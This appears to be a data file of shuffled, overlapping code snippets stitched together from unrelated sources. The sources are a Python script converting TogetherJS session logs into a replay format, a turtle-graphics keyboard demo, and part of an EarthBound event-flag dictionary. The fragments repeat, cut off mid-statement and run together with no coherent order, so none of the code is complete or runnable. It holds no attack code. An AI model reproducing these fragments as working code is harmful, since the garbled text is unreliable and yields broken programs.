"timestamp in milliseconds ms = int(time.mktime(dt.timetuple())) * 1000 # for app.codeEdit events, look", "= e['myAppState'] r = call_opt_backend(myAppState) #print r.url serverResultJson = r.json() if 'trace' in", "# # NB: this won't be fully accurate if there are several *independent*", "actions separately - app.editCode events are DEFINITELY duplicated - app.hashchange events might also", "to record only editCode events belonging # to the firstClientId user and discard", "throw up our hands for nows. NB: one big challenge is that some", "assert firstEditTimestamp <= t assert t - firstEditTimestamp < 5000 # give it", "it a 5-second buffer for sanity checking tjs['clientId'] = firstEdit['clientId'] # change the", "clientId, Value: current username (might change throughout the # session; keep the latest", "final events dt = dateutil.parser.parse(e['date']) # get timestamp in milliseconds ms = int(time.mktime(dt.timetuple()))", "json.loads(line) if rec['type'] != 'togetherjs': continue tjs = rec['togetherjs'] typ = tjs['type'] if", "SIMPLY EXECUTE THE CODE VERBATIM TO GENERATE TRACES FOR THE CACHE; IF THE", "if we have multiple # identical sets of edits that take place at", "in all_code_edits_by_deltas firstEdit = all_code_edits_by_deltas[d][0] firstEditTimestamp = firstEdit['delta']['t'] # sanity check: note that", "to the firstClientId user and discard all other ones. if typ == 'app.editCode'", "keep the latest one) clientIdtoUsername = {} firstInitialAppState = None firstClientId = None", "t assert t - firstEditTimestamp < 5000 # give it a 5-second buffer", "app.codeEdit events, look up who the ORIGINAL PERSON was who # initiated this", "EXECUTE THE CODE VERBATIM TO GENERATE TRACES FOR THE CACHE; IF THE CODE", "= firstInitialAppState['togetherjs']['myAppState'] initialAppState['clientId'] = firstInitialAppState['togetherjs']['clientId'] # augment it firstDt = dateutil.parser.parse(firstInitialAppState['date']) firstTs =", "turns it into the codcast format, which is readable by # ../js/recorder.ts and", "later on; or maybe just add it here?!? events.append(tjs) # each element of", "r = call_opt_backend(myAppState) #print r.url serverResultJson = r.json() if 'trace' in serverResultJson: myTrace", "need to essentially create a python-based driver (maybe using requests) to make the", "occurring at vastly different times which have the same 'd' all_code_edits_by_deltas = defaultdict(list)", "is a pair of [appState, cached trace from server] myTraceCache = [] for", "= json.loads(line) if rec['type'] != 'togetherjs': continue tjs = rec['togetherjs'] typ = tjs['type']", "don't append any initialAppState events: if typ == 'app.initialAppState': continue if typ ==", "None raw_events = [] # Key: delta 'd' field, value: list of code", "is that some types of events are duplicated (or repeated N times if", "event, and log their clientId, which may be # different than your own", "True, 'peer': {'color': '#8d549f'}} # not sure if this is necessary events.insert(0, startRecordingDemoEvent)", "not in ALL_LEGIT_TYPES: continue # read only the FIRST initialAppState since we'll assume", "# the easiest way to manage it is to record only editCode events", "int(time.mktime(dt.timetuple())) * 1000 # for app.codeEdit events, look up who the ORIGINAL PERSON", "tjs['delta']['d'] t = tjs['delta']['t'] assert d in all_code_edits_by_deltas firstEdit = all_code_edits_by_deltas[d][0] firstEditTimestamp =", "belonging # to the firstClientId user and discard all other ones. if typ", "driver (maybe using requests) to make the proper calls to the various OPT", "DO NOT RUN THIS ON UNTRUSTED CODE YET, SINCE IT WILL SIMPLY EXECUTE", "IF THE CODE IS MALICIOUS, THEN IT WILL POSSIBLY HARM YOUR COMPUTER!!! -", "let's cross that bridge when # we get to it assert firstEditTimestamp <=", "firstEditTimestamp < 5000 # give it a 5-second buffer for sanity checking tjs['clientId']", "that i think about it more, it's not entirely clear to me whether", "types of events are duplicated (or repeated N times if there are N", "to this is to run the code on the actual server to generate", "'sync points' since we know that the code in the editor contains those", "rec['type'] != 'togetherjs': continue tjs = rec['togetherjs'] typ = tjs['type'] if typ not", "all other ones. if typ == 'app.editCode' and firstClientId and tjs['clientId'] != firstClientId:", "points' since we know that the code in the editor contains those contents", "we don't need this since TogetherJS will take care of # mapping clientId's", "on; or maybe just add it here?!? events.append(tjs) # each element of myTraceCache", "different than your own clientId if tjs['type'] == 'app.editCode': d = tjs['delta']['d'] t", "import sys import time from call_opt_backend import call_opt_backend # somewhat modeled after ../js/demovideo.ts", "same 'd' # # NB: this won't be fully accurate if there are", "initiated the session if not firstInitialAppState and typ == 'app.initialAppState': firstInitialAppState = rec", "tell who initiated an app.editCode event with any kind of certainty. oh wells,", "outta here! events = [] for e in raw_events: tjs = e['togetherjs'] #", "typ == 'app.editCode' and firstClientId and tjs['clientId'] != firstClientId: continue # ...do the", "tjs['clientId'] # don't append any initialAppState events: if typ == 'app.initialAppState': continue if", "IT WILL POSSIBLY HARM YOUR COMPUTER!!! - the solution to this is to", "# Key: delta 'd' field, value: list of code edit events with that", "any initialAppState events: if typ == 'app.initialAppState': continue if typ == 'app.editCode': all_code_edits_by_deltas[tjs['delta']['d']].append(tjs)", "the session). # the easiest way to manage it is to record only", "# this script converts a codechella session log recorded by # ../../v3/opt_togetherjs/server.js #", "for the firstClientId user if typ == 'hashchange' and firstClientId and tjs['clientId'] !=", "tjs['peer'] = {'color': '#8d549f'} # not sure if this is necessary # TODO:", "in open(sys.argv[1]): rec = json.loads(line) if rec['type'] != 'togetherjs': continue tjs = rec['togetherjs']", "firstClientId and tjs['clientId'] != firstClientId: continue raw_events.append(rec) # if tjs['delta']['d'] == lastEditCodeEvent['togetherjs']['delta']['d']: #", "trace from server] myTraceCache = [] for e in events: if e['type'] ==", "trace cache; we need to essentially create a python-based driver (maybe using requests)", "a python-based driver (maybe using requests) to make the proper calls to the", "# not sure if this is necessary events.insert(0, startRecordingDemoEvent) # ok finally produce", "and ../js/demovideo.ts # # writes JSON output to stdout # created: 2018-05-27 '''", "editCode events belonging # to the firstClientId user and discard all other ones.", "log their clientId, which may be # different than your own clientId if", "events are duplicated (or repeated N times if there are N people in", "several *independent* # sets of edits occurring at vastly different times which have", "of edits occurring at vastly different times which have the same 'd' all_code_edits_by_deltas", "# augment it firstDt = dateutil.parser.parse(firstInitialAppState['date']) firstTs = int(time.mktime(firstDt.timetuple())) * 1000 # milliseconds", "big challenge is that some types of events are duplicated (or repeated N", "of edits that take place at vastly # different points in time, but", "add these fields to match codcast format tjs['ts'] = ms tjs['sameUrl'] = True", "= int(time.mktime(firstDt.timetuple())) * 1000 # milliseconds # prepend a special app.startRecordingDemo event to", "essentially create a python-based driver (maybe using requests) to make the proper calls", "in the editor contains those contents when they execute ''' from collections import", "add it here?!? events.append(tjs) # each element of myTraceCache is a pair of", "the editor contains those contents when they execute ''' from collections import defaultdict", "be duplicated - maybe ONLY take hashchange events for YOURSELF? HUGE WARNING: DO", "... # # Key: clientId, Value: current username (might change throughout the #", "maybe just add it here?!? events.append(tjs) # each element of myTraceCache is a", "if e['type'] == 'app.executeCode': myAppState = e['myAppState'] r = call_opt_backend(myAppState) #print r.url serverResultJson", "import time from call_opt_backend import call_opt_backend # somewhat modeled after ../js/demovideo.ts ALL_LEGIT_TYPES =", "if typ == 'app.editCode' and firstClientId and tjs['clientId'] != firstClientId: continue # ...do", "== lastEditCodeEvent['togetherjs']['delta']['d']: # assert tjs['delta']['t'] >= lastEditCodeEvent['togetherjs']['delta']['t'] # continue # get outta here!", "None firstClientId = None raw_events = [] # Key: delta 'd' field, value:", "time, but let's cross that bridge when # we get to it assert", "are N people in the session) since TogetherJS logs everyone's actions separately -", "import defaultdict import dateutil.parser import json import os import sys import time from", "startRecordingDemoEvent = {'type': 'app.startRecordingDemo', 'clientId': firstInitialAppState['togetherjs']['clientId'], 'ts': firstTs, 'sameUrl': True, 'peer': {'color': '#8d549f'}}", "logs everyone's actions separately - app.editCode events are DEFINITELY duplicated - app.hashchange events", "this won't be fully accurate if there are several *independent* # sets of", "== 'app.initialAppState': firstInitialAppState = rec firstClientId = tjs['clientId'] # don't append any initialAppState", "user and discard all other ones. if typ == 'app.editCode' and firstClientId and", "[appState, cached trace from server] myTraceCache = [] for e in events: if", "much hashchange events matter - maybe we can use app.executeCode events as 'sync", "writes JSON output to stdout # created: 2018-05-27 ''' NB: now that i", "UNTRUSTED CODE YET, SINCE IT WILL SIMPLY EXECUTE THE CODE VERBATIM TO GENERATE", "[] for e in raw_events: tjs = e['togetherjs'] # clean up and append", "tjs = rec['togetherjs'] typ = tjs['type'] if typ not in ALL_LEGIT_TYPES: continue #", "clean up and append to final events dt = dateutil.parser.parse(e['date']) # get timestamp", "event! # add these fields to match codcast format tjs['ts'] = ms tjs['sameUrl']", "get timestamp in milliseconds ms = int(time.mktime(dt.timetuple())) * 1000 # for app.codeEdit events,", "serverResultJson initialAppState = firstInitialAppState['togetherjs']['myAppState'] initialAppState['clientId'] = firstInitialAppState['togetherjs']['clientId'] # augment it firstDt = dateutil.parser.parse(firstInitialAppState['date'])", "append any initialAppState events: if typ == 'app.initialAppState': continue if typ == 'app.editCode':", "dt = dateutil.parser.parse(e['date']) # get timestamp in milliseconds ms = int(time.mktime(dt.timetuple())) * 1000", "(or even more copies if there are more people in the session). #", "firstInitialAppState and typ == 'app.initialAppState': firstInitialAppState = rec firstClientId = tjs['clientId'] # don't", "matter - maybe we can use app.executeCode events as 'sync points' since we", "maybe we can use app.executeCode events as 'sync points' since we know that", "frameNum field later on; or maybe just add it here?!? events.append(tjs) # each", "(maybe using requests) to make the proper calls to the various OPT backends,", "to add frameNum field later on; or maybe just add it here?!? events.append(tjs)" ]
[ "my_turtle = Turtle() screen = Screen() my_turtle.shape('arrow') def forward(): my_turtle.forward(10) def backward(): my_turtle.back(10)", "def backward(): my_turtle.back(10) def right(): my_turtle.right(10) def left(): my_turtle.left(10) def clear_screen(): my_turtle.penup() my_turtle.home()", "import Turtle, Screen my_turtle = Turtle() screen = Screen() my_turtle.shape('arrow') def forward(): my_turtle.forward(10)", "screen = Screen() my_turtle.shape('arrow') def forward(): my_turtle.forward(10) def backward(): my_turtle.back(10) def right(): my_turtle.right(10)", "my_turtle.shape('arrow') def forward(): my_turtle.forward(10) def backward(): my_turtle.back(10) def right(): my_turtle.right(10) def left(): my_turtle.left(10)", "my_turtle.right(10) def left(): my_turtle.left(10) def clear_screen(): my_turtle.penup() my_turtle.home() my_turtle.clear() my_turtle.pendown() screen.listen() screen.onkeypress(forward, 'w')", "forward(): my_turtle.forward(10) def backward(): my_turtle.back(10) def right(): my_turtle.right(10) def left(): my_turtle.left(10) def clear_screen():", "my_turtle.back(10) def right(): my_turtle.right(10) def left(): my_turtle.left(10) def clear_screen(): my_turtle.penup() my_turtle.home() my_turtle.clear() my_turtle.pendown()", "my_turtle.home() my_turtle.clear() my_turtle.pendown() screen.listen() screen.onkeypress(forward, 'w') screen.onkeypress(backward, 's') screen.onkeypress(right, 'd') screen.onkeypress(left, 'a') screen.onkeypress(clear_screen,", "from turtle import Turtle, Screen my_turtle = Turtle() screen = Screen() my_turtle.shape('arrow') def", "= Screen() my_turtle.shape('arrow') def forward(): my_turtle.forward(10) def backward(): my_turtle.back(10) def right(): my_turtle.right(10) def", "Turtle() screen = Screen() my_turtle.shape('arrow') def forward(): my_turtle.forward(10) def backward(): my_turtle.back(10) def right():", "def left(): my_turtle.left(10) def clear_screen(): my_turtle.penup() my_turtle.home() my_turtle.clear() my_turtle.pendown() screen.listen() screen.onkeypress(forward, 'w') screen.onkeypress(backward,", "Screen my_turtle = Turtle() screen = Screen() my_turtle.shape('arrow') def forward(): my_turtle.forward(10) def backward():", "= Turtle() screen = Screen() my_turtle.shape('arrow') def forward(): my_turtle.forward(10) def backward(): my_turtle.back(10) def", "right(): my_turtle.right(10) def left(): my_turtle.left(10) def clear_screen(): my_turtle.penup() my_turtle.home() my_turtle.clear() my_turtle.pendown() screen.listen() screen.onkeypress(forward,", "clear_screen(): my_turtle.penup() my_turtle.home() my_turtle.clear() my_turtle.pendown() screen.listen() screen.onkeypress(forward, 'w') screen.onkeypress(backward, 's') screen.onkeypress(right, 'd') screen.onkeypress(left,", "my_turtle.left(10) def clear_screen(): my_turtle.penup() my_turtle.home() my_turtle.clear() my_turtle.pendown() screen.listen() screen.onkeypress(forward, 'w') screen.onkeypress(backward, 's') screen.onkeypress(right,", "my_turtle.forward(10) def backward(): my_turtle.back(10) def right(): my_turtle.right(10) def left(): my_turtle.left(10) def clear_screen(): my_turtle.penup()", "turtle import Turtle, Screen my_turtle = Turtle() screen = Screen() my_turtle.shape('arrow') def forward():", "backward(): my_turtle.back(10) def right(): my_turtle.right(10) def left(): my_turtle.left(10) def clear_screen(): my_turtle.penup() my_turtle.home() my_turtle.clear()", "my_turtle.pendown() screen.listen() screen.onkeypress(forward, 'w') screen.onkeypress(backward, 's') screen.onkeypress(right, 'd') screen.onkeypress(left, 'a') screen.onkeypress(clear_screen, 'c') screen.exitonclick()", "Turtle, Screen my_turtle = Turtle() screen = Screen() my_turtle.shape('arrow') def forward(): my_turtle.forward(10) def", "def clear_screen(): my_turtle.penup() my_turtle.home() my_turtle.clear() my_turtle.pendown() screen.listen() screen.onkeypress(forward, 'w') screen.onkeypress(backward, 's') screen.onkeypress(right, 'd')", "my_turtle.penup() my_turtle.home() my_turtle.clear() my_turtle.pendown() screen.listen() screen.onkeypress(forward, 'w') screen.onkeypress(backward, 's') screen.onkeypress(right, 'd') screen.onkeypress(left, 'a')", "my_turtle.clear() my_turtle.pendown() screen.listen() screen.onkeypress(forward, 'w') screen.onkeypress(backward, 's') screen.onkeypress(right, 'd') screen.onkeypress(left, 'a') screen.onkeypress(clear_screen, 'c')", "def forward(): my_turtle.forward(10) def backward(): my_turtle.back(10) def right(): my_turtle.right(10) def left(): my_turtle.left(10) def", "left(): my_turtle.left(10) def clear_screen(): my_turtle.penup() my_turtle.home() my_turtle.clear() my_turtle.pendown() screen.listen() screen.onkeypress(forward, 'w') screen.onkeypress(backward, 's')", "def right(): my_turtle.right(10) def left(): my_turtle.left(10) def clear_screen(): my_turtle.penup() my_turtle.home() my_turtle.clear() my_turtle.pendown() screen.listen()", "Screen() my_turtle.shape('arrow') def forward(): my_turtle.forward(10) def backward(): my_turtle.back(10) def right(): my_turtle.right(10) def left():" ]
[ "'PHOTO_DEEP_DARKNESS_AVAILABLE', 509: 'PHOTO_TENDA_VILLAGE_AVAILABLE', 510: 'PHOTO_SATURN_VALLEY_FINAL_AVAILABLE', 511: 'GOT_TOWN_MAP', 512: 'HAS_EXIT_MOUSE', 513: 'ONETT_POST_METEORITE_MUSIC', 514: 'JUST_RESTED_AT_HOME',", "'GUARDIAN_HIEROGLYPH_16_DEFEATED', 406: 'GUARDIAN_HIEROGLYPH_17_DEFEATED', 407: 'LETHAL_ASP_HIEROGLYPH_1_DEFEATED', 408: 'LETHAL_ASP_HIEROGLYPH_2_DEFEATED', 409: 'LETHAL_ASP_HIEROGLYPH_3_DEFEATED', 410: 'LETHAL_ASP_HIEROGLYPH_4_DEFEATED', 411: 'LETHAL_ASP_HIEROGLYPH_5_DEFEATED',", "618: 'GOT_ERASER_ERASER', # 619 (Unkonwn. Related to Stonehenge Base) 620: 'APPLE_MOUSE_AT_WINTERS_LAB', 621: 'MONKEYS_AT_WINTERS_LAB',", "# 316 (Unknown. Something about the City Bus?) 317: 'RUNAWAY_BUS_FROM_FOURSIDE_TO_THREED', 318: 'RUNAWAY_FIVE_AT_CLUMSY_ROBOT_ROOM', 319:", "671 (???) 672: 'POKEY_FLIES_AWAY_BY_HELICOPTER', 673: 'HIDE_TWOSON_BURGLIN_BAKERY_TOWN_MAP', 674: 'HIDE_SCARABA_FOOD_TOWN_MAP', 675: 'MACH_PIZZA_ZOMBIE_PAPER_DELIVERY', 676: 'HIDE_THREED_BUS_STOP_1_TOWN_MAP', 677:", "'HIDE_ONETT_TO_TWOSON_TOWN_MAP', 564: 'HIDE_TWOSON_HOTEL_TOWN_MAP', 565: 'HIDE_TWOSON_DEPT_STORE_TOWN_MAP', 566: 'HIDE_TWOSON_TO_ONETT_TOWN_MAP', 567: 'HIDE_TWOSON_BUS_STOP_TOWN_MAP', 568: 'HIDE_TWOSON_HOSPITAL_TOWN_MAP', 569: 'HIDE_TWOSON_TO_THREED_TOWN_MAP',", "search for shyness book\"? This flag is set even if you don't talk", "418: 'BRICK_ROAD_DUNGEON_PROTOPLASM_1_DEFEATED', 419: 'BRICK_ROAD_DUNGEON_PROTOPLASM_2_DEFEATED', 420: 'BRICK_ROAD_DUNGEON_MOUSE_1_DEFEATED', 421: 'BRICK_ROAD_DUNGEON_MOUSE_2_DEFEATED', 422: 'ONETT_DAYTIME', 423: 'UNDERWORLD_TALKING_ROCK_STOPPED_TALKING', 424:", "'QUEST_TO_SUBMARINE', 152: 'PYRAMID_DANCE_IN_PROGRESS', 153: 'TENDA_VILLAGE_UNDERGROUND_OPEN', 154: 'TALKED_TO_TENDA_CHIEF', 155: 'TENDAS_NOT_SHY', # 156 (???) #", "708: 'GOT_PHOTO_SATURN_VALLEY_COFFEE', 709: 'GOT_PHOTO_CIRCUS_TENT', 710: 'GOT_PHOTO_BLACK_SESAME_SEED', 711: 'GOT_PHOTO_DESERT_MINE', 712: 'GOT_PHOTO_FOURSIDE_BRIDGE', 713: 'GOT_PHOTO_FOURSIDE_MUSEUM_OUTSIDE', 714:", "746: 'SCAM_HOUSE_UNLOCKED', # 747 (??? Something about Runaway Five Tour Bus???) 748: 'SKY_RUNNER_AT_WINTERS_LAB',", "'WINTERS_MUSIC', 545: 'LAST_MELODY_AT_LILLIPUT_STEPS', 546: 'LAST_MELODY_AT_MILKY_WELL', 547: 'LAST_MELODY_AT_PINK_CLOUD', 548: 'LAST_MELODY_AT_FIRE_SPRING', 549: 'QUEUE_OUTSIDE_CHAOS_THEATER', 550: 'GOT_SUPORMA',", "'GUARDIAN_HIEROGLYPH_6_DEFEATED', 396: 'GUARDIAN_HIEROGLYPH_7_DEFEATED', 397: 'GUARDIAN_HIEROGLYPH_8_DEFEATED', 398: 'GUARDIAN_HIEROGLYPH_9_DEFEATED', 399: 'GUARDIAN_HIEROGLYPH_10_DEFEATED', 400: 'GUARDIAN_HIEROGLYPH_11_DEFEATED', 401: 'GUARDIAN_HIEROGLYPH_12_DEFEATED',", "'TALKED_TO_TWOSON_HOTEL_GUY_AT_TABLE_NINE_TIMES', 738: 'GOT_MONEY_FROM_TWOSON_HOTEL_GUY_AT_TABLE', 739: 'PAULAS_DAD_RAN_IN_FRONT_OF_TWOSON_HOTEL', 740: 'PEOPLE_IN_THREED_ABSENT', 741: 'MONOTOLI_AT_48TH_FLOOR', 742: 'LARDNA_AT_HOME', 743: 'VISITED_HAPPY_HAPPY_VILLAGE',", "'SHOP_SCARABA_BAZAAR_EQUIPMENT', 326: 'SHOP_SCARABA_HOTEL_ARMS_DEALER', 327: 'PHASE_DISTORTER_V3_AT_CAVE_OF_THE_PRESENT', 328: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_1', 329: 'APPLE_KID_AT_CAVE_OF_THE_PRESENT', 330: 'MR_SATURN_AT_CAVE_OF_THE_PRESENT', 331: 'ANDONUTS_AT_CAVE_OF_THE_PRESENT_2',", "'FLYING_MAN_3_DEAD', 207: 'FLYING_MAN_4_DEAD', 208: 'FLYING_MAN_5_DEAD', 209: 'VISITED_ONETT', 210: 'VISITED_TWOSON', 211: 'VISITED_THREED', 212: 'VISITED_WINTERS',", "differ from 72?) # 283 (???) 284: 'PEACEFUL_REST_PENCIL_ERASED', 285: 'TALKED_TO_APPLE_KID_CAVE_OF_THE_PRESENT', # 286 (???)", "'GOT_STOIC_CLUB_PHONE', 204: 'FLYING_MAN_1_DEAD', 205: 'FLYING_MAN_2_DEAD', 206: 'FLYING_MAN_3_DEAD', 207: 'FLYING_MAN_4_DEAD', 208: 'FLYING_MAN_5_DEAD', 209: 'VISITED_ONETT',", "215: 'VISITED_SUMMERS', 216: 'VISITED_DALAAM', 217: 'VISITED_SCARABA', 218: 'VISITED_DEEP_DARKNESS', 219: 'VISITED_TENDA_VILLAGE', 220: 'VISITED_UNDERWORLD', 221:", "699: 'GOT_PHOTO_SCAM_HOUSE', 700: 'GOT_PHOTO_CYCLE_SHOP', 701: 'GOT_PHOTO_PEACEFUL_REST_VALLEY', 702: 'GOT_PHOTO_HAPPY_HAPPY_CABIN', 703: 'GOT_PHOTO_CHAOS_THEATER', 704: 'GOT_PHOTO_LAKE_TESS', 705:", "144 (Related to Bulldozer at Fourside Bridge?) 145: 'TALKED_TO_DYING_EVERDRED', 146: 'RUNAWAY_FIVE_FREE_FROM_TOPOLLA_THEATER', # 147", "408: 'LETHAL_ASP_HIEROGLYPH_2_DEFEATED', 409: 'LETHAL_ASP_HIEROGLYPH_3_DEFEATED', 410: 'LETHAL_ASP_HIEROGLYPH_4_DEFEATED', 411: 'LETHAL_ASP_HIEROGLYPH_5_DEFEATED', 412: 'LETHAL_ASP_HIEROGLYPH_6_DEFEATED', 413: 'LETHAL_ASP_HIEROGLYPH_7_DEFEATED', 414:", "185: 'GOT_MELODY_MILKY_WELL', 186: 'GOT_MELODY_MAGNET_HILL', 187: 'GOT_MELODY_PINK_CLOUD', 188: 'GOT_MELODY_LUMINE_HALL', 189: 'GOT_MELODY_FIRE_SPRING', 190: 'CONQUERED_SANCTUARY_1', 191:", "730: 'TALKED_TO_ONETT_BAKERY_LADY_TWICE', 731: 'SHOP_UNDERWORLD_TENDA', 732: 'SHOP_MAGICANT', 733: 'SHOP_MOONSIDE', 734: 'ONETT_HOSPITAL_PATIENT_OWNER_JOKE', 735: 'TALKED_TO_SMASH_WOUND_GIRLS_MOTHER', 736:", "'SENTRY_ROBOT_5_DEFEATED', 362: 'SENTRY_ROBOT_6_DEFEATED', 363: 'SHARK_OUTSIDE_ARCADE_1_DEFEATED', 364: 'SHARK_OUTSIDE_ARCADE_2_DEFEATED', 365: 'SHARK_AT_ARCADE_ABSENT', 366: 'SLIMY_LITTLE_PILE_1_DEFEATED_AND_THREED_BLOND_GUY_BY_TENT_ABSENT', 367: 'SLIMY_LITTLE_PILE_2_DEFEATED',", "'GUARDIAN_HIEROGLYPH_15_DEFEATED', 405: 'GUARDIAN_HIEROGLYPH_16_DEFEATED', 406: 'GUARDIAN_HIEROGLYPH_17_DEFEATED', 407: 'LETHAL_ASP_HIEROGLYPH_1_DEFEATED', 408: 'LETHAL_ASP_HIEROGLYPH_2_DEFEATED', 409: 'LETHAL_ASP_HIEROGLYPH_3_DEFEATED', 410: 'LETHAL_ASP_HIEROGLYPH_4_DEFEATED',", "'GOT_PHOTO_PYRAMID', 726: 'GOT_PHOTO_SCARABA_OASIS', 727: 'GOT_PHOTO_DEEP_DARKNESS', 728: 'GOT_PHOTO_TENDA_VILLAGE', 729: 'GOT_PHOTO_SATURN_VALLEY_FINAL', 730: 'TALKED_TO_ONETT_BAKERY_LADY_TWICE', 731: 'SHOP_UNDERWORLD_TENDA',", "save your game. WHAT?) 805: 'PRESENT_CRACKED_BAT', 829: 'PRESENT_TONY_COOKIE_1', 830: 'PRESENT_TONY_COOKIE_2', 831: 'PRESENT_TONY_COOKIE_3', 832:", "defeating Belch) 762: 'DUNGEON_MAN_GOODBYE_EXIT_SIGN', 763: 'PICKY_KNOCKING_ON_DOOR', 764: 'READY_TO_LEARN_TELEPORT', 765: 'LEARNED_PHASE_DISTORTER_V2_FUNCTIONS', 766: 'EXIT_MOUSE_DISAGREEABLE', 767:", "'CONQUERED_SANCTUARY_1', 191: 'CONQUERED_SANCTUARY_2', 192: 'CONQUERED_SANCTUARY_4', 193: 'CONQUERED_SANCTUARY_3', 194: 'CONQUERED_SANCTUARY_5', 195: 'CONQUERED_SANCTUARY_6', 196: 'CONQUERED_SANCTUARY_7',", "511: 'GOT_TOWN_MAP', 512: 'HAS_EXIT_MOUSE', 513: 'ONETT_POST_METEORITE_MUSIC', 514: 'JUST_RESTED_AT_HOME', 515: 'FRANK_DEFEATED', 516: 'MONKEY_CAVE_PENCIL_ERASED', 517:", "Related to traffic jam?) # 371 (???) 372: 'PARTY_IS_ROBOTIFIED', # 373 (Unknown. Related", "'GUARDIAN_HIEROGLYPH_14_DEFEATED', 404: 'GUARDIAN_HIEROGLYPH_15_DEFEATED', 405: 'GUARDIAN_HIEROGLYPH_16_DEFEATED', 406: 'GUARDIAN_HIEROGLYPH_17_DEFEATED', 407: 'LETHAL_ASP_HIEROGLYPH_1_DEFEATED', 408: 'LETHAL_ASP_HIEROGLYPH_2_DEFEATED', 409: 'LETHAL_ASP_HIEROGLYPH_3_DEFEATED',", "(???) 171: 'GOT_SATURN_LIFENOODLES', 172: 'GOT_SATURN_COIN', 173: 'GOT_SATURN_STAG_BEETLE', 174: 'DESERT_MINE_EXPANDED', # 175 (Unknown. Set", "'HIDE_THREED_HOSPITAL_TOWN_MAP', 575: 'HIDE_FOURSIDE_HOSPITAL_TOWN_MAP', 576: 'HIDE_FOURSIDE_DEPT_STORE_TOWN_MAP', 577: 'HIDE_FOURSIDE_BAKERY_TOWN_MAP', 578: 'HIDE_FOURSIDE_HOTEL_TOWN_MAP', 579: 'HIDE_SCARABA_HOTEL_TOWN_MAP', 580: 'HIDE_SCARABA_HOSPITAL_TOWN_MAP',", "133: 'PHASE_DISTORTER_V2_OPEN', 134: 'DELIVERED_ZEXONYTE', 135: 'TALKED_TO_BLACK_SESAME_SEED', 136: 'TRAFFIC_JAM_CLEARED', 137: 'GAVE_FOOD_TO_MONTAGUE', 138: 'TALKED_TO_WHITE_SESAME_SEED', 139:", "'TALKED_TO_SMASH_WOUND_GIRLS_MOTHER', 736: 'GOT_PAIR_OF_DIRTY_SOCKS', 737: 'TALKED_TO_TWOSON_HOTEL_GUY_AT_TABLE_NINE_TIMES', 738: 'GOT_MONEY_FROM_TWOSON_HOTEL_GUY_AT_TABLE', 739: 'PAULAS_DAD_RAN_IN_FRONT_OF_TWOSON_HOTEL', 740: 'PEOPLE_IN_THREED_ABSENT', 741: 'MONOTOLI_AT_48TH_FLOOR',", "'SHOP_SOLD_OLD_EQUIPMENT', 225: 'SHOP_SOLD_ITEM', # 226 (I hate multipurpose flags) # 227 (I hate", "'PAULA_JOINS', 14: 'JEFF_JOINS', 15: 'MONSTERS_IN_WINTERS', 16: 'POO_JOINS', 17: 'POO_LEARNING_STARSTORM', 18: 'BUZZ_BUZZ_IN_PARTY', 19: 'SLEEPING_KING_ABSENT',", "# 170 (???) 171: 'GOT_SATURN_LIFENOODLES', 172: 'GOT_SATURN_COIN', 173: 'GOT_SATURN_STAG_BEETLE', 174: 'DESERT_MINE_EXPANDED', # 175", "joins) 199: 'GOT_DAD_PHONE', 200: 'GOT_MOM_PHONE', 201: 'GOT_ESCARGO_EXPRESS_PHONE', 202: 'GOT_MACH_PIZZA_PHONE', 203: 'GOT_STOIC_CLUB_PHONE', 204: 'FLYING_MAN_1_DEAD',", "709: 'GOT_PHOTO_CIRCUS_TENT', 710: 'GOT_PHOTO_BLACK_SESAME_SEED', 711: 'GOT_PHOTO_DESERT_MINE', 712: 'GOT_PHOTO_FOURSIDE_BRIDGE', 713: 'GOT_PHOTO_FOURSIDE_MUSEUM_OUTSIDE', 714: 'GOT_PHOTO_FOURSIDE_MUSEUM_INSIDE', 715:", "474: 'NESS_MOM_OUTSIDE', # 475 (Handles continue yes/no on death. TODO: Investigate) 476: 'POLICE_BARRIERS_AT_ONETT_HILLTOP',", "Pencil Eraser. Cleared when you defeat Mr. Carpainter) 176: 'HEALER_SOFTEN', 177: 'HEALER_PURIFY', 178:", "flag for Starman DX defeated. One of them might be responsible only for", "680 (Something about Venus show about to start?) 681: 'SHOW_ONETT_HINT_TOWN_MAP', 682: 'SHOW_TWOSON_HINT_TOWN_MAP', 683:", "121: 'DID_NOT_PAY_FOOD_STAND', 122: 'CARPAINTER_HAS_KEY', 123: 'BLUE_COW_ALT_TEXT', 124: 'ZOMBIE_PAPER_ON_TENT', 125: 'ZOMBIES_ON_TENT_FLOOR', 126: 'LEARNED_ABOUT_SHYNESS_BOOK', #", "'GOT_METEORITE_PIECE', 80: 'GOT_KEY_TO_SHACK', 81: 'HAS_BICYCLE', 82: 'GOT_RECEIVER_PHONE', 83: 'GOT_PENCIL_ERASER', 84: 'GOT_HAND_AID', 85: 'GOT_WAD_OF_BILLS',", "583: 'HIDE_SUMMERS_RESTAURANT_TOWN_MAP', 584: 'HIDE_SUMMERS_SHOP_TOWN_MAP', 585: 'HIDE_SUMMERS_HOSPITAL_TOWN_MAP', 586: 'HIDE_TOTO_SHOP_TOWN_MAP', 587: 'FLYING_MAN_MUSIC', # 588 (Visibility", "Base) 620: 'APPLE_MOUSE_AT_WINTERS_LAB', 621: 'MONKEYS_AT_WINTERS_LAB', 622: 'BUBBLE_MONKEYS_WIFE_AT_WINTERS', 623: 'PUNK_GUY_OUTSIDE_HIS_HOUSE_THREED', 624: 'EVERDRED_AT_HIS_HOUSE', # 625", "14: 'JEFF_JOINS', 15: 'MONSTERS_IN_WINTERS', 16: 'POO_JOINS', 17: 'POO_LEARNING_STARSTORM', 18: 'BUZZ_BUZZ_IN_PARTY', 19: 'SLEEPING_KING_ABSENT', 20:", "'GOT_MR_BASEBALL_CAP', 78: 'GOT_ENTERTAINERS_TRAVEL_CHARM', 79: 'GOT_METEORITE_PIECE', 80: 'GOT_KEY_TO_SHACK', 81: 'HAS_BICYCLE', 82: 'GOT_RECEIVER_PHONE', 83: 'GOT_PENCIL_ERASER',", "122: 'CARPAINTER_HAS_KEY', 123: 'BLUE_COW_ALT_TEXT', 124: 'ZOMBIE_PAPER_ON_TENT', 125: 'ZOMBIES_ON_TENT_FLOOR', 126: 'LEARNED_ABOUT_SHYNESS_BOOK', # TODO: Maybe", "137: 'GAVE_FOOD_TO_MONTAGUE', 138: 'TALKED_TO_WHITE_SESAME_SEED', 139: 'DEPT_STORE_SPOOK_DEFEATED', # TODO: Confirm 140: 'QUEST_TO_VENUS_AUTOGRAPH', 141: 'GOT_TROUT_YOGURT',", "62: 'DUNGEON_MAN_IN_DESERT', 63: 'PATH_TO_MANI_MANI_OPEN', 64: 'FRANKYSTEIN_MKII_DEFEATED', # 65 (???) 66: 'EVERDRED_DEFEATED', 